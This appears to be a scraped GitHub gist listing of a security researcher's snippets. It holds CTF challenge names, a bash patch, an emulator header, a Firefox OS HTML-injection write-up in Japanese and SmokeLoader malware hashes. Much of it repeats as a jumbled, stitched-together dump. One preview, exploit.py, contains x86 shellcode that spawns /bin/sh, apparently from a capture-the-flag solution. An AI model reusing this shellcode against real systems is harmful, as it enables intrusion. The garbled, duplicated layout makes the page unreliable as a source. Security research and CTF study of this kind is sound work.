Yuma Kurogome ntddk

## analyze.py
#coding=utf-8
import sys,os
import re
from collections import defaultdict,namedtuple
from itertools import *

def scc(edges,redges):
    def dfs(v):
        used.add(v)
        if v in edges:

## gist:eb3be3bc824b53e50466
\A(?<院号>[一-龠]+院)(?<道号>[一-龠]+)(?<戒名>[一-龠]+)(?<位号>居士|信士|信女|童子|童女|水子|禅尼)\Z

## bash.patch
diff --git a/variables.c b/variables.c
index 92a5a10..b485dab 100644
--- a/variables.c
+++ b/variables.c
@@ -347,39 +347,6 @@ initialize_shell_variables (env, privmode)

       temp_var = (SHELL_VAR *)NULL;

-      /* If exported function, define it now.  Don't import functions from
-	 the environment in privileged mode. */

## gist:20a7d772492eaba830c7
#include <string.h>
#include <stdint.h>
#include <iostream>
#include <fstream>
#include "SDL.h"

class RAM;
class CPU;
class PPU;


## gist:09b7265bc95dfb000a7c
PlaidDB - Plaid 2015
Prodmanager - Plaid 2015
qttpd - Plaid 2015
tp - Plaid 2015
traveller - Plaid 2015
Weff - CODEGATE 2015
icbm - CODEGATE 2015
beef_steak - CODEGATE 2015
Bookstore - CODEGATE 2015
Olive and Mushroom Pizza - CODEGATE 2015

## exploit.py
import struct
import socket
from telnetlib import Telnet

senryu1 = '\x8d\x48\x19\x31\xdb'
senryu2 = '\x6a\x7f\x5a\x6a\x03\x58\x90'
senryu3 = '\xcd\x80\xff\xe1\x90'

# execve("/bin/sh", {"/bin/sh", NULL}, NULL)
shellcode = '\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80'

## geteip.c
#include "DECAF_types.h"
#include "DECAF_main.h"
#include "DECAF_callback.h"
#include "DECAF_callback_common.h"
#include "vmi_callback.h"
#include "utils/Output.h"
#include "DECAF_target.h"
#include "hookapi.h"

static plugin_interface_t geteip_interface;

## 1101158.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              9 stars
            
          
                nishimunea
                / 1101158.md
            
            
              Last active
              July 26, 2016 02:33
            
          
    How HTML Injection Is Bad on Firefox OS

「Firefox OS Advent Calendar 2014」と「脆弱性"&'<<>\ Advent Calendar 2014」の12月20日の記事です。
先月報告したFirefox OSのHTMLインジェクションバグ(Bug 1101158 )について紹介します。このバグはFirefox OS Simulatorを含む一部の環境ではまだ修正されていませんが、リスク評価の上、Mozillaよりちょうど本日(！！)、公開の許可を頂き掲載しております。
HTML Injection on Firefox OS (Bug 1101158)

Firefox OS v2.1/v2.2には、端末のホームボタンを長押ししたときに表示されるカードビューに、HTMLインジェクションの可能な箇所がありました。カードビューとはアクティブなウィンドウの一覧を表示する機能なのですが、ウィンドウのタイトルにHTMLタグが含まれることが考慮されていませんでした。

  
## geteip.c
#include "DECAF_types.h"
#include "DECAF_main.h"
#include "DECAF_callback.h"
#include "DECAF_callback_common.h"
#include "vmi_callback.h"
#include "utils/Output.h"
#include "DECAF_target.h"
#include "hookapi.h"

static plugin_interface_t geteip_interface;

## nao_sec-170712_Malware dropped by RIG(2017 May-June).md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              1 star
            
          
                pinksawtooth
                / nao_sec-170712_Malware dropped by RIG(2017 May-June).md
            
            
              Last active
              July 31, 2017 10:24
            
              
                nao_sec-170712_Malware dropped by RIG(2017 May-June)
              
          
    DecimalIP


Date
Hash
Family


5/1
0f391cb9897dfd4ad91c66a7b17f28df8c82d8ece937a411394a7bee27a6e330
SmokeLoader


5/2
b1ac30b73b959603bb2c42f97bab6ca48f5a953a1fcb50bacb06f0eb5e2402c7
SmokeLoader


5/7
0aea25457447b35ef7bb9baa849be1a2c5a06f926d4387d9540040f34cc25851
SmokeLoader


5/8
0fd66826ca59b33c8f9d116c97a80e632cf87821fba6e9a3ea10321e757e41c2
SmokeLoader


5/10
0fd66826ca59b33c8f9d116c97a80e632cf87821fba6e9a3ea10321e757e41c2
SmokeLoader
	#coding=utf-8
	import sys,os
	import re
	from collections import defaultdict,namedtuple
	from itertools import *

	def scc(edges,redges):
	def dfs(v):
	used.add(v)
	if v in edges:
	diff --git a/variables.c b/variables.c
	index 92a5a10..b485dab 100644
	--- a/variables.c
	+++ b/variables.c
	@@ -347,39 +347,6 @@ initialize_shell_variables (env, privmode)

	temp_var = (SHELL_VAR *)NULL;

	- /* If exported function, define it now. Don't import functions from
	- the environment in privileged mode. */
	#include <string.h>
	#include <stdint.h>
	#include <iostream>
	#include <fstream>
	#include "SDL.h"

	class RAM;
	class CPU;
	class PPU;
	PlaidDB - Plaid 2015
	Prodmanager - Plaid 2015
	qttpd - Plaid 2015
	tp - Plaid 2015
	traveller - Plaid 2015
	Weff - CODEGATE 2015
	icbm - CODEGATE 2015
	beef_steak - CODEGATE 2015
	Bookstore - CODEGATE 2015
	Olive and Mushroom Pizza - CODEGATE 2015
	import struct
	import socket
	from telnetlib import Telnet

	senryu1 = '\x8d\x48\x19\x31\xdb'
	senryu2 = '\x6a\x7f\x5a\x6a\x03\x58\x90'
	senryu3 = '\xcd\x80\xff\xe1\x90'

	# execve("/bin/sh", {"/bin/sh", NULL}, NULL)
	shellcode = '\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80'
	#include "DECAF_types.h"
	#include "DECAF_main.h"
	#include "DECAF_callback.h"
	#include "DECAF_callback_common.h"
	#include "vmi_callback.h"
	#include "utils/Output.h"
	#include "DECAF_target.h"
	#include "hookapi.h"

	static plugin_interface_t geteip_interface;
Date	Hash	Family
5/1	0f391cb9897dfd4ad91c66a7b17f28df8c82d8ece937a411394a7bee27a6e330	SmokeLoader
5/2	b1ac30b73b959603bb2c42f97bab6ca48f5a953a1fcb50bacb06f0eb5e2402c7	SmokeLoader
5/7	0aea25457447b35ef7bb9baa849be1a2c5a06f926d4387d9540040f34cc25851	SmokeLoader
5/8	0fd66826ca59b33c8f9d116c97a80e632cf87821fba6e9a3ea10321e757e41c2	SmokeLoader
5/10	0fd66826ca59b33c8f9d116c97a80e632cf87821fba6e9a3ea10321e757e41c2	SmokeLoader